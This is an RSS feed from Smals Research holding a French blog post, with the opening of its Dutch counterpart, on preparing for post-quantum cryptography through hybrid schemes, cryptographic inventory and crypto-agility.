<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Cybersecurity &#8211; Smals Research</title>
	<atom:link href="https://www.smalsresearch.be/tag/cybersecurity/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.smalsresearch.be</link>
	<description></description>
	<lastBuildDate>Thu, 09 Apr 2026 12:23:57 +0000</lastBuildDate>
	<language>en-GB</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.4</generator>

<image>
	<url>https://www.smalsresearch.be/wp-content/uploads/2026/01/cropped-cropped-Smals_Research-32x32.png</url>
	<title>Cybersecurity &#8211; Smals Research</title>
	<link>https://www.smalsresearch.be</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Comment préparer la migration vers la cryptographie post-quantique&#160;?</title>
		<link>https://www.smalsresearch.be/comment-preparer-la-migration-vers-la-cryptographie-post-quantique/</link>
		
		<dc:creator><![CDATA[Kristof Verslype]]></dc:creator>
		<pubDate>Mon, 04 Nov 2024 15:47:53 +0000</pubDate>
				<category><![CDATA[[FR]]]></category>
		<category><![CDATA[Blog post]]></category>
		<category><![CDATA[cryptography]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[quantum computing]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[standards]]></category>
		<guid isPermaLink="false">/?p=21333</guid>

					<description><![CDATA[La cryptographie est indispensable dans notre société actuelle. Les algorithmes cryptographiques qui étaient autrefois considérés comme extrêmement sûrs sont aujourd'hui totalement inadaptés. Il faudra un jour, par exemple avec l'avènement probable de puissants ordinateurs quantiques, s'affranchir progressivement ou très rapidement des méthodes cryptographiques qui sont la norme aujourd'hui. Cet article examine les préparatifs que nous pouvons faire à cette fin.]]></description>
										<content:encoded><![CDATA[


<p><em>Dit artikel is ook beschikbaar&nbsp;in het <a href="/inzichtelijk-en-wendbaar-beheer-van-cryprografie-met-cryptographic-governance/" data-type="post" data-id="21119">Nederlands</a>.</em></p>



<p>La cryptographie est la science qui applique des principes mathématiques en vue de sécuriser les données. Elle est indispensable dans notre société actuelle. Il suffit de penser aux communications sécurisées et à la signature électronique de toutes sortes de documents. Les algorithmes cryptographiques qui étaient autrefois considérés comme extrêmement sûrs sont aujourd&#8217;hui totalement inadaptés. Il faudra un jour, par exemple avec l&#8217;avènement probable de puissants ordinateurs quantiques, s&#8217;affranchir progressivement ou très rapidement des méthodes cryptographiques qui sont la norme aujourd&#8217;hui. Cet article examine les préparatifs que nous pouvons faire à cette fin.</p>



<h2 class="wp-block-heading"><strong>La cryptographie sécurisée devient douteuse</strong><strong></strong></h2>



<p>Les mécanismes cryptographiques peuvent se dégrader pour diverses raisons, telles que l&#8217;augmentation de la puissance des ordinateurs, les percées dans le domaine de la cryptanalyse et &#8211; c&#8217;est ce qui nous préoccupe le plus aujourd&#8217;hui &#8211; la capacité de construire de puissants ordinateurs quantiques.&nbsp;</p>



<p><strong>Puissance de calcul</strong><strong></strong></p>



<p>Une première raison est l&#8217;augmentation de la puissance de calcul disponible sur les ordinateurs classiques. En 1977, le <a href="https://fr.wikipedia.org/wiki/Data_Encryption_Standard">DES</a> (Data Encryption Standard) a été normalisé. Le DES offrait une sécurité de 56 bits, ce qui signifie qu&#8217;un attaquant devait rechercher la clé dans un espace de recherche de 2<sup>56</sup> (72 millions de milliards) possibilités. Actuellement, en raison notamment de l&#8217;augmentation exponentielle de la puissance de calcul disponible, et conformément à la <a href="https://fr.wikipedia.org/wiki/Loi_de_Moore">loi de Moore</a>, une sécurité minimale de 128 bits est exigée. &nbsp;</p>



<p>Aujourd&#8217;hui, RSA-2048 est encore couramment utilisé pour l&#8217;authentification, l&#8217;échange de clés et les signatures électroniques, entre autres. Il figure encore aujourd&#8217;hui sur certaines cartes d&#8217;identité électroniques actives en Belgique. Avec la sécurité de 112 bits qu&#8217;il offre, il n&#8217;est pas immédiatement insécurisé, mais il est préférable de procéder à sa suppression progressive. Quoi qu&#8217;il en soit, il est vivement déconseillé de l&#8217;adopter dans de nouveaux systèmes.</p>



<p><strong>Cryptanalyse</strong><strong></strong></p>



<p>Les percées dans le domaine de la cryptanalyse constituent une deuxième raison pour laquelle les mécanismes cryptographiques peuvent perdre de leur sécurité. La cryptanalyse est l&#8217;art de trouver les faiblesses des méthodes cryptographiques. Pendant la Seconde Guerre mondiale, il a été crucial de déchiffrer <a href="https://fr.wikipedia.org/wiki/Enigma_(machine)">Enigma</a>, qui permettait auparavant au commandement nazi de communiquer en toute sécurité avec ses sous-marins. La cryptanalyse différentielle a également permis de réduire la sécurité du DES de 56 à 47 bits. Plus récemment, la cryptanalyse continue de jouer un rôle important. En 2008, par exemple, on est parvenu à générer un <a href="https://blog.mozilla.org/security/2008/12/30/md5-weaknesses-could-lead-to-certificate-forgery/">faux certificat TLS</a>, parce que la fonction de hachage cryptographique sous-jacente, MD5, était devenue peu sûre à la suite de percées dans le domaine de la cryptanalyse.</p>



<p><strong>Ordinateurs quantiques cryptographiquement pertinents</strong><strong></strong></p>



<p>La menace d&#8217;ordinateurs quantiques devenant plus puissants d&#8217;année en année constitue une troisième menace, qui pourrait éventuellement rendre toute la cryptographie moderne à clé publique dangereuse. &nbsp;Les signatures numériques, l&#8217;authentification par clé publique, les connexions TLS, etc. deviendraient alors totalement incertaines. Ces machines sont généralement appelées <em>ordinateurs quantiques cryptographiquement pertinents</em>.</p>



<p>Personne ne sait vraiment quand (ni même si) il sera possible de construire de tels ordinateurs quantiques. Même les experts ont des avis fortement divergents, comme le montre l&#8217;illustration ci-dessous, où 46 experts ont été interrogés en 2021. La moitié d&#8217;entre eux estimaient qu&#8217;il y avait au moins 50&nbsp;% de chances qu&#8217;un tel ordinateur quantique soit construit d&#8217;ici 15 ans, c&#8217;est-à-dire d&#8217;ici 2036.</p>



<figure class="wp-block-image size-full"><a href="/wp-content/uploads/2024/08/image-2.png"><img fetchpriority="high" decoding="async" width="975" height="638" src="/wp-content/uploads/2024/08/image-2.png" alt="" class="wp-image-21120" srcset="https://www.smalsresearch.be/wp-content/uploads/2024/08/image-2.png 975w, https://www.smalsresearch.be/wp-content/uploads/2024/08/image-2-300x196.png 300w, https://www.smalsresearch.be/wp-content/uploads/2024/08/image-2-768x503.png 768w" sizes="(max-width: 975px) 100vw, 975px" /></a><figcaption class="wp-element-caption"><em>Source&nbsp;: M. Mosca and M. Piani, “2021 quantum threat timeline report,” Global Risk Institute, Toronto, ON, 2022.</em></figcaption></figure>



<p></p>



<p>Cela ne veut cependant pas dire que nous pouvons attendre encore une dizaine d&#8217;années. Après tout, un attaquant peut aujourd&#8217;hui intercepter et stocker des communications chiffrées. Plusieurs années plus tard, si cet attaquant a accès à un ordinateur quantique pertinent sur le plan cryptographique, il pourrait toujours déchiffrer les données, qui pourraient encore être sensibles. C&#8217;est ce qu&#8217;on appelle l&#8217;attaque <a href="https://en.wikipedia.org/wiki/Harvest_now,_decrypt_later"><em>harvest now decrypt later</em></a>.</p>



<p>Le BSI, l&#8217;agence allemande de cybersécurité, <a href="https://pkic.org/events/2023/pqc-conference-amsterdam-nl/pkic-pqcc_stephan-ehlen_bsi_post-quantum-policy-and-roadmap-of-the-bsi.pdf">recommande</a> de partir du principe que des ordinateurs quantiques pertinents sur le plan cryptographique seront disponibles au début de la prochaine décennie et d&#8217;en tenir compte dès aujourd&#8217;hui dans l&#8217;évaluation des risques. Il ne s&#8217;agit donc pas d&#8217;une prédiction, mais d&#8217;une ligne directrice prudente pour l&#8217;évaluation des risques.</p>



<h2 class="wp-block-heading"><strong>Nouvelles normes et confiance</strong><strong></strong></h2>



<p>Il existe donc un risque important que des ordinateurs quantiques pertinents sur le plan cryptographique soient construits dans un avenir pas si lointain. Heureusement, le NIST (National Institute for Standards and Technologies) mène depuis 2016 une procédure de normalisation de la <strong>cryptographie post-quantique (PQC)</strong>. Elle se compose de deux parties&nbsp;:</p>



<ul class="wp-block-list">
<li>L’encapsulation de clé (KEM)<strong> </strong>permet à deux parties de se mettre d&#8217;accord sur une clé partagée qui chiffre les données à échanger.</li>



<li>Les <strong>signatures numériques</strong> permettent entre autres de signer des documents de manière électronique et d&#8217;authentifier les parties.</li>
</ul>



<p>En août 2024, le NIST <a href="https://csrc.nist.gov/News/2024/postquantum-cryptography-fips-approved">a publié</a> les premières normes&nbsp;:</p>



<ul class="wp-block-list">
<li><a href="https://csrc.nist.gov/pubs/fips/203/final">ML-KEM</a>, basé sur <a href="https://pq-crystals.org/kyber/index.shtml">CRYSTALS-KYBER</a>, est la première norme à résistance quantique pour l’encapsulation de clés.</li>



<li><a href="https://csrc.nist.gov/pubs/fips/204/final">ML-DSA</a>, basée sur <a href="https://pq-crystals.org/dilithium/">CRYSTALS-Dilithium</a> et <a href="https://csrc.nist.gov/pubs/fips/205/final">SLH-DSA</a>, basée sur <a href="https://sphincs.org/">Sphincs+</a>, sont les deux premières normes de signatures numériques résistantes aux attaques quantiques. Une troisième norme est encore en cours d&#8217;élaboration. La future norme FN-DSA, basée sur <a href="https://falcon-sign.info/">Falcon</a>, sera publiée dans les prochains mois.&nbsp;</li>
</ul>



<p>Dans <a href="/de-weg-richting-kwantumresistente-standaarden/">un article précédent</a>, j&#8217;ai donné une idée, entre autres, des performances auxquelles on peut s&#8217;attendre, ainsi que de la taille des clés et des signatures numériques.</p>



<p>Aux États-Unis, il existe déjà un solide engagement en faveur de ces nouvelles normes, comme en témoigne le <a href="https://www.congress.gov/bill/117th-congress/house-bill/7535">Quantum Computing Cybersercurity Preparedness Act</a>, signé en décembre 2022 par le président Biden. Il stipule qu&#8217;endéans les six mois, les agences fédérales doivent développer une stratégie pour leur migration vers une cryptographie résistante au quantum.</p>



<p>En Europe, nous sommes un peu plus prudents. La principale agence de cybersécurité en Allemagne, la BSI, déclare&nbsp;:</p>



<p><em>The quantum-safe algorithms that are currently being standardized are not yet as well researched as the “classical” methods (for example RSA and ECC). This applies in particular to weaknesses that largely only become apparent in applications, such as typical implementation errors, possible side-channel attacks, etc. BSI therefore recommends that post-quantum cryptography should not be used in isolation if possible, but only in hybrid mode, i.e. in combination with classical algorithms.</em></p>



<p>C&#8217;est un raisonnement valide. Fin 2016, le NIST a lancé, comme mentionné plus haut, une procédure de normalisation pour une cryptographie à clé publique résistante au quantum de nouvelle génération. En novembre 2017, 82 algorithmes candidats ont été soumis. SIKE était un des huit algorithmes candidats figurant parmi les finalistes. En 2022 &#8211; donc cinq ans plus tard &#8211; le groupe de recherche COSIC de la KU Leuven a découvert une faiblesse fondamentale, ce qui fait que le chiffrement à l&#8217;aide de SIKE pourrait être <a href="https://www.esat.kuleuven.be/cosic/blog/an-efficient-key-recovery-attack-on-sidh/">cassé</a> en quelques minutes sur un ordinateur classique. Cette faiblesse est passée sous le radar de la communauté globale de cryptanalyse. Nous souhaitons éviter le scénario d&#8217;un changement massif vers un nouveau mécanisme cryptographique, qui ne s’avère pas aussi sûr que ce que l&#8217;on pensait. De plus, les implémentations encore jeunes de ces algorithmes peuvent contenir des vulnérabilités.</p>



<p>Il faudra donc un certain temps pour développer une confiance suffisante dans les nouvelles normes et leur mise en œuvre.</p>



<h2 class="wp-block-heading"><strong>Mode hybride</strong><strong></strong></h2>



<p>Le BSI propose donc de travailler dans un premier temps en mode hybride, ce qui signifie que la cryptographie classique à clé publique soit utilisée en tandem avec une cryptographie résistante aux attaques quantiques. Lorsqu&#8217;un des deux algorithmes est jugé dangereux, il n&#8217;y a pas de problème tant que l&#8217;autre algorithme est sûr. Cette manière de travailler offre donc une double couche de protection.</p>



<p>Examinons concrètement comment cela fonctionne. Afin d&#8217;établir un canal de communication sécurisé, deux parties doivent convenir d&#8217;une clé partagée. Il s’agit d’une des étapes du protocole TLS. Aujourd&#8217;hui, la méthode <a href="https://fr.wikipedia.org/wiki/%C3%89change_de_cl%C3%A9s_Diffie-Hellman">Diffie-Hellman key exchange</a> est souvent utilisée, où X25519 représente une instanciation concrète basée sur la courbe elliptique <a href="https://fr.wikipedia.org/wiki/Curve25519">Curve25519</a> Diffie-Hellman n&#8217;est malheureusement pas capable de faire face aux ordinateurs quantiques cryptographiquement pertinents. La nouvelle norme ML-KEM, basée sur CRYSTALS-KYBER, est supposée l&#8217;être. Dans l&#8217;illustration ci-dessous, le client et le serveur se mettent d&#8217;accord sur deux clés partagées en parallèle, la clé orange est définie avec X25519, la verte avec CRYSTALS-KYBER. Ces deux clés sont ensuite combinées en une clé unique, qui est ensuite utilisée pour crypter et décrypter les données échangées.</p>



<figure class="wp-block-image size-full"><a href="/wp-content/uploads/2024/08/image-3.png"><img decoding="async" width="975" height="706" src="/wp-content/uploads/2024/08/image-3.png" alt="" class="wp-image-21122" srcset="https://www.smalsresearch.be/wp-content/uploads/2024/08/image-3.png 975w, https://www.smalsresearch.be/wp-content/uploads/2024/08/image-3-300x217.png 300w, https://www.smalsresearch.be/wp-content/uploads/2024/08/image-3-768x556.png 768w" sizes="(max-width: 975px) 100vw, 975px" /></a><figcaption class="wp-element-caption"><em>&nbsp;Le client et le serveur se mettent d&#8217;accord sur deux clés partagées en parallèle, la clé orange est en accord avec l&#8217;algorithme X25519, la verte avec l&#8217;algorithme CRYSTALS-KYBER. Ces deux clés sont ensuite combinées en une clé unique, qui est ensuite utilisée pour crypter et décrypter les données échangées</em></figcaption></figure>



<p></p>



<h2 class="wp-block-heading"><strong>Gouvernance cryptographique</strong><strong></strong></h2>



<p>Il existe divers mécanismes cryptographiques qui étaient autrefois populaires, mais qui ne sont pas sûrs aujourd&#8217;hui. DES, 3DES, MD5 et SHA1 en sont des exemples. Une migration de l&#8217;ancienne vers une nouvelle cryptographie est donc un fait dont nous devons tenir compte. De plus, l&#8217;histoire a démontré que les migrations cryptographiques complètes, telles que celle de 3DES vers AES, peuvent traîner pendant jusqu&#8217;à<a href="https://www.esat.kuleuven.be/cosic/blog/rwc-2022-where-is-the-research-on-cryptographic-transition-and-agility/"> dix ans</a> et nécessiter beaucoup de ressources. Une migration cryptographique est donc un processus difficile et délicat.</p>



<p>Un mode hybride entraîne en outre immédiatement deux migrations futures. La première consiste à passer de la cryptographie à clé publique actuelle au mode hybride. Une fois qu&#8217;une confiance suffisante a été développée dans les nouvelles normes et leurs implémentations, l&#8217;on migre vers une cryptographie entièrement résistante aux attaques quantiques.</p>



<p>Une gouvernance cryptographique saine nous aide à repérer les domaines dans lesquels les migrations sont les plus urgentes, ainsi qu&#8217;à effectuer la migration elle-même. La gouvernance cryptographique permet à une organisation de comprendre où et comment la cryptographie est utilisée et de mettre en œuvre et de surveiller les changements tels que les migrations. Elle se compose, entre autres, des pièces de puzzle ci-dessous&nbsp;:</p>



<ul class="wp-block-list">
<li>L&#8217;<strong>inventaire cryptographique</strong> offre une vue d&#8217;ensemble des mécanismes cryptographiques utilisés, avec quels paramètres (par exemple, la longueur des clés), dans quel but (par exemple, la protection des données en transit), où et afin de protéger quelles données (par exemple, les données médicales personnelles).</li>



<li>Les <strong>recommandations cryptographiques </strong>concrètes&nbsp;; quels algorithmes et paramètres cryptographiques (par exemple la longueur des clés) sont sûrs, lesquels devraient être progressivement abandonnés, lesquels ne sont pas sûrs, &#8230; De telles recommandations sont déjà présentes au sein de Smals et ont vu le jour grâce à Smals Research. Compte tenu de la menace que représentent les puissants ordinateurs quantiques, il est probable que la cryptographie classique à clé publique recommandée aujourd&#8217;hui devra être progressivement abandonnée dans un avenir pas si lointain.</li>



<li><strong>Documentation des exceptions.</strong> Des exceptions temporaires aux recommandations en matière de cryptographie peuvent être tolérées afin d&#8217;éviter que la communication avec des systèmes externes (par exemple des clients ou des prestataires de services) ne soit de facto impossible. Ces exceptions doivent être documentées&nbsp;; le risque doit être décrit, ainsi que la portée, la fenêtre temporelle et son acceptation par la direction.</li>



<li>Les recommendations de crypto-agilité doivent aider les équipes de projet à construire et à personnaliser les applications et les services selon les principes de crypto-agilité. Cela signifie que les futures migrations cryptographiques doivent être prises en compte.</li>



<li>Une<strong> politique cryptographique</strong> est nécessaire pour éviter que les recommandations cryptographiques ne soient interprétées comme des suggestions sans valeur obligatoire, ce qui leur donnerait un caractère contraignant. En effet, la politique cryptographique de Smals fait référence à nos recommandations. Une politique cryptographique conduit à une simplification (uniformisation) du paysage cryptographique au sein de l&#8217;organisation. Elle peut guider la migration vers des normes résistantes aux attaques quantiques et encourager la création d&#8217;applications et de services d&#8217;une manière crypto-agile.</li>



<li><strong>Surveillance cryptographique</strong>. En observant le trafic réseau, nous percevons quels mécanismes cryptographiques sont utilisés et à quel endroit, ce qui peut aider à guider les migrations. Un tel monitoring ne nécessite heureusement pas l&#8217;accès aux données en transit. &nbsp;</li>
</ul>



<p>Smals Research a l&#8217;intention au cours de la période à venir de dresser un tableau plus précis de l&#8217;inventaire cryptographique et de la crypto-agilité en particulier. En effet, les principes de la crypto-agilité et l&#8217;idée de l&#8217;inventaire cryptographique existent aujourd&#8217;hui, mais l&#8217;élaboration concrète fait malheureusement encore défaut, non seulement chez Smals, mais dans le monde entier. D&#8217;une manière générale, nous avons donc encore du <a href="https://dl.acm.org/doi/pdf/10.1145/3567825">pain</a> sur la planche.</p>



<h2 class="wp-block-heading"><strong>Inventaire cryptographique</strong><strong></strong></h2>



<p>Un inventaire cryptographique peut fournir une vue d&#8217;ensemble, entre autres, des éléments suivants</p>



<ul class="wp-block-list">
<li>les mécanismes cryptographiques utilisés. Par exemple, <a href="https://fr.wikipedia.org/wiki/Elliptic_curve_digital_signature_algorithm">ECDSA</a> pour établir des signatures numériques ou <a href="https://fr.wikipedia.org/wiki/Advanced_Encryption_Standard">AES</a> pour le chiffrement en bulk.</li>



<li>les paramètres utilisés dans le processus. Par exemple, l&#8217;ECDSA peut utiliser la courbe elliptique <a href="https://csrc.nist.gov/csrc/media/events/workshop-on-elliptic-curve-cryptography-standards/documents/papers/session6-adalier-mehmet.pdf">P-256</a> et l&#8217;AES peut être déployé en mode <a href="https://fr.wikipedia.org/wiki/Galois/Counter_Mode">GCM</a> avec des clés d&#8217;une longueur de 256 bits.</li>



<li>les librairies ou services cryptographiques utilisés dans le processus. <a href="https://www.bouncycastle.org/">BouncyCastle</a> 1.78 et <a href="https://www.openssl.org/">OpenSSL</a> 3.0 sont des exemples de librairies. Les exemples de services sont le service de <a href="/basisprincipes-voor-een-moderne-pseudonimiseringsdienst-2/">pseudonymisation aveugle </a>d&#8217;eHealth et <a href="https://aws.amazon.com/cloudhsm/">AWS CloudHSM</a>.&nbsp;</li>



<li>Quelles données sont protégées et dans quel but. Par exemple, l&#8217;intégrité et la confidentialité des données médicales au repos.</li>



<li>L&#8217;endroit où la cryptographie est utilisée dans le code. Dans la classe AbcSigner, de la ligne 254 à la ligne 269.</li>
</ul>



<p>En résumé, l&#8217;inventaire cryptographique nous permet de localiser rapidement les faiblesses ou les faiblesses potentielles et, par conséquent, les endroits où des mises à jour ou des migrations sont nécessaires.</p>



<p>L&#8217;inventaire n&#8217;est pas un exercice ponctuel, mais doit toujours être mis à jour. Des outils de découverte, tels que <a href="https://quantumxc.com/blog/nist-updates-pqc-guidance-cryptographic-discovery-using-cipherinsights-from-quantum-xchange/">CipherInsights</a>, <a href="https://mediacenter.ibm.com/media/IBM+Quantum+Safe+Explorer/1_f4wlr4lb">IBM Quantum Safe Explorer</a>, <a href="https://www.infosecglobal.com/products/agilesec-analytics">AgileSec Analytics</a> et <a href="https://qryptocyber.com/qryptodiscover/">QryptoDiscover</a>, entre autres, peuvent nous aider à le construire et à le tenir à jour.&nbsp;</p>



<p>Un tel inventaire peut contenir de nombreux détails et devenir très complexe, en particulier pour les grandes organisations. La compilation et l&#8217;actualisation de cet inventaire risquent donc de devenir une opération très gourmande en ressources. Une organisation utilise par ailleurs, entre autres, des librairies cryptographiques, des services cryptographiques, du hardware de tiers, etc. Il est donc nécessaire de disposer d&#8217;un moyen structuré et normalisé d&#8217;exprimer un inventaire cryptographique qui facilite l&#8217;automatisation et l&#8217;intégration. C&#8217;est ce à quoi travaille IBM avec son <a href="https://research.ibm.com/blog/cryptographic-bill-of-materials">CBOM</a> (Cryptography Bill of Materials). Nous espérons que cette proposition sera adoptée rapidement.</p>



<p>Un inventaire cryptographique offrirait un certain nombre d&#8217;avantages en plus de la migration vers la cryptographie à résistance quantique&nbsp;:</p>



<p><strong>Securité &amp; résilience</strong><strong></strong></p>



<p>Le risque cryptographique est la possibilité de dommages à l&#8217;organisation lorsque la cryptographie ne fait pas ce qu&#8217;elle est censée faire, notamment par l&#8217;utilisation de mécanismes cryptographiques obsolètes ou de paramètres non sécurisés, par une mauvaise gestion des clés et des certificats ou par des vulnérabilités dans les implémentations des algorithmes cryptographiques. Dans le <a href="https://owasp.org/Top10/">OWASP top 10</a>, un document de sensibilisation destiné aux développeurs et conernant la sécurité des applications web, les ‘<em>cryptographic failures</em>’ arrivent en deuxième position. En guise d&#8217;exemple, nous comptons les <a href="https://www.bbc.com/news/world-us-canada-49159859">$150M+ Capital One hack</a> comme la violation des données personnelles de millions d&#8217;utilisateurs à la suite d&#8217;un problème de gestion des clés, et le <a href="https://www.pcmag.com/news/it-turns-out-marriott-wasnt-using-encryption-before-huge-data-breach">$200M+ Marriott Hotel hack</a>, où une utilisation incomplète du cryptage a rendu publics des millions de numéros de passeports. L&#8217;inventaire cryptographique, éventuellement complété par une surveillance cryptographique, rend les risques cryptographiques transparents et contribue ainsi à prévenir de tels incidents. La crypto-agilité, à son tour, devrait nous permettre de migrer rapidement vers une cryptographie sécurisée.</p>



<p><strong>Conformité</strong><strong></strong></p>



<p>En partie à cause de ces incidents, les auditeurs se contentent de moins en moins d&#8217;informations superficielles sur l&#8217;utilisation de la cryptographie. Un inventaire cryptographique, éventuellement complété par des logs de surveillance cryptographique, leur permet d&#8217;accéder facilement à tous les détails concernant l&#8217;utilisation de la cryptographie au sein de l&#8217;organisation.</p>



<p>Il est donc logique que la possession et la tenue d&#8217;un inventaire cryptographique soient de plus en plus recommandées, voire imposées. Dans la publication conjointe de la NSA, du NIST et de la CISA <a href="https://www.cisa.gov/sites/default/files/2023-08/Quantum%20Readiness_Final_CLEAR_508c%20%283%29.pdf">Quantum Readiness</a>&nbsp;:<a href="https://www.cisa.gov/sites/default/files/2023-08/Quantum%20Readiness_Final_CLEAR_508c%20%283%29.pdf">Migration To Post-quantum Cryptography</a>, on peut lire, par exemple&nbsp;:</p>



<p><em>&nbsp;</em>“<em>Organizations should create a cryptographic inventory that offers visibility into how the organization leverages cryptography in its IT (Information Technology) and OT (Operational Technology) systems.&nbsp;</em>“</p>



<p>C&#8217;est surtout lorsque l&#8217;inventaire cryptographique peut être accompagné de recommandations cryptographiques détaillées que la <em>compliance</em> devient intéressante. Ces dernières, comme nous l&#8217;avons déjà mentionné, sont déjà présentes chez Smals grâce à Smals Research.</p>



<h2 class="wp-block-heading"><strong>Crypto-agilité</strong><strong></strong></h2>



<p>Un inventaire cryptographique est une étape nécessaire vers l&#8217;agilité cryptographique, ou crypto-agilité en abrégé. Elle consiste à remplacer et à adapter les mécanismes cryptographiques, qu&#8217;il s&#8217;agisse de software, de hardware ou d&#8217;infrastructure, sans interrompre le bon fonctionnement du système lui-même. Ainsi, les anciens mécanismes cryptographiques peuvent être éliminés progressivement et de nouveaux mécanismes peuvent être adoptés.</p>



<p>En dépit de la difficulté à définir l&#8217;agilité cryptographique, la <a href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=4709806">définition</a> ci-dessous, qui se compose de trois aspects, semble assez précise.</p>



<ul class="wp-block-list">
<li>La capacité des systèmes à se mettre d&#8217;accord en temps réel sur leurs algorithmes de sécurité en se basant sur leurs <a href="https://csrc.nist.gov/glossary/term/security_functions">fonctions de sécurité</a> combinées (c&#8217;est-à-dire le matériel, les logiciels et les microprogrammes utilisés pour assurer la sécurité d&#8217;un système)&nbsp;;</li>



<li>La capacité d&#8217;ajouter de nouvelles fonctions cryptographiques ou de nouveaux algorithmes au matériel ou aux logiciels existants, ce qui permet d&#8217;obtenir de nouvelles fonctions de sécurité plus robustes&nbsp;;</li>



<li>la capacité de désactiver élégamment les systèmes cryptographiques devenus vulnérables ou obsolètes.</li>
</ul>



<p>Un prochain article sera consacré à la manière de mettre en pratique l&#8217;agilité cryptographique plus concrètement et aux défis qui en découlent. En attendant, le protocole TLS peut nous inspirer. TLS est un protocole cryptographique conçu pour permettre une communication sécurisée entre deux parties sur un réseau informatique. Les deux parties conviennent entre elles des mécanismes cryptographiques qu&#8217;elles souhaitent utiliser pour l&#8217;authentification, l&#8217;échange de clés, le cryptage et le hachage. Chaque partie ne prend en charge que les mécanismes qu&#8217;elle juge sûrs. Ceci est décrit dans un fichier de configuration, qui nous permet d&#8217;ajouter de nouveaux mécanismes cryptographiques et de supprimer progressivement les anciens sans affecter le fonctionnement de l&#8217;application mère.</p>



<h2 class="wp-block-heading"><strong>Conclusion</strong><strong></strong></h2>



<p>Les ordinateurs quantiques sont qualifiés de cryptographiquement pertinents lorsqu&#8217;ils sont en mesure de casser la cryptographie moderne à clé publique. Actuellement, nous en sommes encore loin et les incertitudes sont nombreuses. Nous ne savons même pas si l&#8217;humanité sera un jour capable de construire de telles machines. Néanmoins, il est sage de faire preuve de prudence et de se préparer à cette éventualité.</p>



<p>La menace que représentent actuellement les ordinateurs quantiques et la publication des nouvelles normes cryptographiques résistantes à la quantification sont donc une bonne raison de nous poser une question plus générale&nbsp;: comment pouvons-nous rendre notre gouvernance cryptographique plus naturelle, de manière à ce que</p>



<ol class="wp-block-list">
<li>nous puissions mieux comprendre quelle cryptographie est utilisée au sein de l&#8217;organisation, et</li>



<li>nous soyons en mesure d&#8217;effectuer une migration relativement aisée si cela s&#8217;avère nécessaire.</li>
</ol>



<p>Cela vaut indépendamment de la menace que représentent les puissants ordinateurs quantiques.</p>



<p>Smals effectue déjà ces préparatifs aujourd&#8217;hui. Nous disposons déjà de recommandations et d&#8217;une politique en matière de cryptographie.&nbsp;Toutefois, il reste encore beaucoup à faire, notamment en ce qui concerne l&#8217;inventaire cryptographique et l&#8217;adoption de la crypto-agilité. Ce sont des éléments sur lesquels Smals Research travaillera au cours de la période à venir.</p>



<p>Il y a encore beaucoup de questions et d&#8217;incertitudes aujourd&#8217;hui, qui ne doivent pas nous empêcher d&#8217;agir dès à présent. Nous pensons d&#8217;ailleurs que la publication des nouvelles normes du NIST accélérera les choses.</p>



<p>En résumé et en guise de conclusion, je <a href="https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Crypto/Marktumfrage_EN_Kryptografie_Quantencomputing.html">citerai</a> le Dr. Schabhüser, vice-président de la BSI allemande&nbsp;:</p>



<p><em>« Si je pouvais donner trois conseils aux entreprises et aux organisations, ce serait&nbsp;:</em></p>



<ul class="wp-block-list">
<li><em>Intégrez le risque cryptogrqphique &nbsp;dans votre système de gestion de risque</em></li>



<li><em>Créez un inventaire cryptographique</em></li>



<li><em>Implémentez et utiliser la crypto-agilité »</em></li>
</ul>



<p><strong>N’hésitez pas à nous contacter pour davantage d&#8217;informations ou une éventuelle collaboration.</strong></p>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<p><em><em>Cette contribution a été soumise par Kristof Verslype, cryptographe chez Smals Research. Elle a été rédigée en son nom propre et ne prend pas position au nom de Smals.</em></em></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Hoe de migratie naar kwantumresistente cryptografie voorbereiden?</title>
		<link>https://www.smalsresearch.be/inzichtelijk-en-wendbaar-beheer-van-cryprografie-met-cryptographic-governance/</link>
		
		<dc:creator><![CDATA[Kristof Verslype]]></dc:creator>
		<pubDate>Mon, 07 Oct 2024 04:00:00 +0000</pubDate>
				<category><![CDATA[[NL]]]></category>
		<category><![CDATA[Blog post]]></category>
		<category><![CDATA[cryptography]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Productivity]]></category>
		<category><![CDATA[quantum computing]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[software engineering]]></category>
		<category><![CDATA[standards]]></category>
		<guid isPermaLink="false">/?p=21119</guid>

					<description><![CDATA[Cryptografie is onmisbaar in onze huidige samenleving. Cryptografische algoritmes die ooit als extreem veilig beschouwd werden, zijn vandaag volstrekt onvoldoende. Ooit zullen we, bijvoorbeeld door de komst van krachtige kwantumcomputers, geleidelijk of erg snel moeten migreren, weg van cryptografische methodes die vandaag de norm zijn. Dit artikel gaat in op de voorbereidingen die we kunnen treffen om dit zo snel en efficiënt als mogelijk te laten gebeuren.]]></description>
										<content:encoded><![CDATA[
<p><em>Cet article est aussi disponible en <a href="/comment-preparer-la-migration-vers-la-cryptographie-post-quantique/">français</a>.</em></p>
<p>Cryptografie is de wetenschap die wiskundige principes toepast om gegevens te beveiligen. Het is onmisbaar in onze huidige samenleving. Denk maar aan veilige communicatie en het elektronisch ondertekenen van allerlei documenten. Cryptografische algoritmes die ooit als extreem veilig beschouwd werden, zijn vandaag volstrekt onvoldoende. Ooit zullen we &#8211; bijvoorbeeld door de komst van krachtige kwantumcomputers &#8211; geleidelijk of erg snel moeten migreren, weg van cryptografische methodes die vandaag de norm zijn. Dit artikel gaat in op de voorbereidingen die we daartoe kunnen treffen.</p>



<h1 class="wp-block-heading">Veilige cryptografie wordt onveilig</h1>



